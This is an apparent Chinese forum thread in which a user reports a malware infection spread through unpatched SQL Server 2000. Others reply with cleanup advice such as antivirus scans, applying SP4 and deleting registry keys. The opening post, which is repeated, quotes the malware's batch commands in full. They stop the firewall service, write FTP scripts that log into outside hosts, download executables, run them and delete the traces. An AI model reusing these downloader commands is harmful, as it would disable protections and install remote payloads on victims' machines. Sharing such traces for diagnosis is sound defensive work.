最近老是发现自动增加很多cmd进程,只要一装SQL server就100%中毒,它们也不增加系统资源,但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。不知大家有没有中过类似的病毒,是我下载的SQLSERVER2000本身就有病毒还是其它原因
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。不知大家有没有中过类似的病毒,是我下载的SQLSERVER2000本身就有病毒还是其它原因
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。
一般说来,下载来的SQL SERVER安装文件中不会有病毒,如有,可能是安装后你没打上补丁而被黑了一下,否则不会出现你说的这种情况.
1、可以使用360安全卫士或者是其它的杀木马的软件,检测一下电脑中,全盘扫描一下,看你贴出来的病毒代码好像是木马之类的
2、卸载现在的Sql Server,删除所有的下载的文件,重新下载一个Sql,下载的时候注意看一下评论
3、安装好Sql之后,一定要打上SP4的补丁
4、检查一下电脑上有没有防火墙,如果没有的话最好是安装一个,防火墙对于防范一些病毒的攻击还是有用的。
异常的bat 打开发现调用了你所说的文件... 然后在搜索bat里指向的文件 删除, 删除完后再删除bat 删除之前要先把cmd进程结束掉\
我的现在开机没cmd 进程了
一直找不到原因,重做了几次系统,火大。
没办法找了个纯净的系统安装盘,每个要装的软件都测试,发现是SQL的问题。
我装完SQL server2000没打SP4补丁观察了一阵子发现没有问题。
决定打SP4,重新运行,打开查询分析器,就发现c:/windows/system32底下多了
system1.bat,dboy.sys,dboy1.sys,dboy.bat几个文件,里面内容基本和你一样。
但是拿nod32和360都查不出它的安装包有木马。可能打包到SP4安装文件了,
明天从官网下个SP4补丁试试。
不知道你是不是也是这样的问题。
用卡巴+360 无论如何都没有整死?求高手想想办法啊~~
2)、把Microsoft SQL Server文件夹整个删掉;
3)、运行注册表,删除如下项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSSQLSERVER
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLSERVERAGENT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSSQLSERVERADHELPER
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server
4)、需要的话就重新启动系统;
5)、重新安装。